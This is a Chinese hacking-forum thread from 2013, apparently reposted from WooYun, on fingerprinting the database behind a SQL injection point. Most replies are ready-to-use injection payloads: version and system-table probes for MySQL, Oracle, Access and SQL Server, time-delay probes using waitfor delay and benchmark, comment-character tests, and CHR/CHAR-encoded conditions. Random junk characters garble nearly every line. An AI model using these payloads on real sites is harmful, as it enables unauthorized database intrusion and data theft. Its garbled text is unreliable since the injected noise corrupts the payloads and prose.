一个注射点如何最快速确认是什么类型数据库
1 O- s3 y% K. Y4 F% S2 Txsser (十根阳具有长短!!) | 2013-02-05 12:36
. ^) O- m) e9 t4 n: O3 ^假设这么一个注射点:
; A" h; s# v) a+ {2 Hshow.html?id=2, ~. D% \. J1 l2 v/ L/ x$ o
mysql:id=2 and version()>0
$ X7 H; y$ P) o7 v8 p" Z4 O6 C' v5 poracle:id=2 and '1'||'1'='116 ^3 Q8 _& J1 N2 S/ b$ V
其他的欢迎补充; H/ _4 ]! |$ Y) s* {
1#
0 S1 X( P9 b3 R6 w; u) uupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 12:47
7 T2 o) n" P0 y) `Access:
3 ~7 C2 s9 l e5 N* s- _aNd aSc(cHr(97))=97" L- r' C3 V% [
and exists(select id from MSysAccessObjects)
2 ^' g# \* w8 m' }* u( [0 |SQL Server:2 ]$ _# B+ ~. f! |% m( M
and exists(select id from sysobjects)
0 [0 N" _ U; m5 } `7 y# Land length(user)>0
; H: x+ l, w" g4 }MySQL:" e1 i" t% m& Z, k: O% T+ K
and length(user())>08 X6 x" H# p- n: a
2#
# t* S- K- }" z2 Oxsser (十根阳具有长短!!) | 2013-02-05 12:48
7 e& S( t8 p0 `6 {& E@upload 如果这些都不是呢…
0 G/ P" i- E' M3#& k9 B8 p8 U0 [6 m, s5 Q! f1 H6 O
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:03& V) J; g9 G* a2 B% t1 r
@xsser 不快速的,延时注入( I" b, K4 I( a
不知道这样写对不对; }' X7 H% t- @ l6 N2 @' f+ o( y
mssql:id=2 and IF(ascii(SUBSTRING('name',1,1))>0)waitfor delay'0:00:3'
# T5 E1 z4 M( K% y& a3 z1 Qmysql:id=2 and select benchmark(1e8,current_date());/ ~0 O9 P6 N8 i* r" d) n' |7 F
4#8 y+ W2 i0 R& J. V' V' t$ u3 ^
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:10/ [3 y B% _: _+ ]( L4 r
最快的貌似是看报错信息5 F+ d( z6 Q; c; d3 [( g* Z8 y0 d e! h
oracle error2 a5 P- B* L, p7 j& x3 a
mssql error
! ]: w, k8 D+ _; T0 ?" l0 ]mysql error) z2 p \: a* k/ B* S; W* S
5#
" i/ `3 L2 N. G8 X+ qNimda (你们都是坏银~) | 2013-02-05 13:142 c G$ I, z- o8 f5 Y2 \
小菜献丑来一发 Oracle:id=2 and 0<>(select count(*) from dual)
, x% H4 ?$ |& u/ r: o: K6## |5 ]) k4 q3 A/ n: B
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:21
' _# V3 _1 q2 t) E“/*”是MySQL中的注释符,返回错误说明该注入点不是MySQL,继续提交如下查询字符:
; k) @: ~0 `, I“–”是Oracle和MSSQL支持的注释符,如果返回正常,则说明为这两种数据库类型之一。继续提交如下查询字符:4 g% j( r; {8 s; u# T
“;”是子句查询标识符,Oracle不支持多行查询,因此如果返回错误,则说明很可能是Oracle数据库。( L; B/ ?& Y/ |8 s& v! F
7#- H& p- N N$ E
_Evil (HackEnd) | 2013-02-05 13:33
/ S: @" J% V& Z$ ]& P& j6 xPostgreSQL/ M' l) Y# i' x
8#2 k- x" o' E' W& t2 V
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:42
' o \3 B4 R6 @0 u5 W切换编码 and 1=1
! n a6 {: Q& m% N5 d% z* [" poracle:
' }6 o- y/ @4 p" N! pCHR(97) || CHR(110) || CHR(100) || CHR(32) || CHR(49) || CHR(61) || CHR(49)/ s- h, }. i: s5 p
mssql:
3 b/ @3 D% D+ ?2 }: v: k7 q" eCHAR(97) + CHAR(110) + CHAR(100) + CHAR(32) + CHAR(49) + CHAR(61) + CHAR(49)
9 X( t. b8 x% umysql:$ B& V* j4 ^5 y/ Y8 G/ l+ n
CHAR(97, 110, 100, 32, 49, 61, 49)
9 q, K: {- ~( p. ]: k4 H9#
; S4 N. ` g: W& m# Xxsser (十根阳具有长短!!) | 2013-02-05 14:31
3 E% q, K- D1 c! d@upload 比较常见的数据库这些还是可以判断的,但是还有其他奇葩类型的呢?' c5 h* c0 }: h1 Y
10#
7 b3 F$ d9 \6 K; w# \upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 14:46
. i2 ]- X+ J0 p7 f$ C@xsser 是奇葩数据库类型的么?
6 K, @# f" C# x% O( v- O5 N根据注入的原理,我们可以猜想,要成功的注入,必须使得注入后的一片和谐,那么使用该类数据库特性来判断,综上所述:
/ Y8 }' s- ^/ v# b T6 P4 w1.是否可以使用特定的函数来判断,该数据库特有的7 `2 T5 T: `, d
2.是否可以使用辅助的符号来判断,如注释符号、多语句查询符等等
2 d/ C/ E( D7 J& g+ M3.是否可以编码查询
3 v& m5 }# M! s7 I7 o7 h0 H4.是否显可以利用错信息
2 z- n8 ]0 K8 t$ W& S3 k5.是否存在数据库某些特性辅助判断$ y1 H$ n8 s; Q& W5 _) o$ i
个人见解' I- Y) p; I: e5 K) A2 t, x
11## ], X/ R# n" b9 n% g; Y# U+ ?: E
小胖子 (z7y壮士,来,干了这碗酒!) | 2013-02-05 14:55
n( P) T6 \5 S0 {9 P1 Y( I已收藏,mssql可以直接看到错误提示的吧~3 `" r" M# J: v8 Q
12#
! G: x# E; e2 T0 k6 u& D6 M9 A! U YPasser_by | 2013-02-05 15:09) ?* y6 `* J6 a0 ], w' d3 k5 o
曾被 @GaRY 面过我这题。。。紧张了。。后来回家sqlmap判断注射点的时候抓包看了下。。。一抓包全出来了居然。。
' {$ o2 N2 }9 m7 e# ]. z! Efrom:http://zone.wooyun.org/content/260 |
发表于 2013-2-11 09:54:04
收藏
支持
反对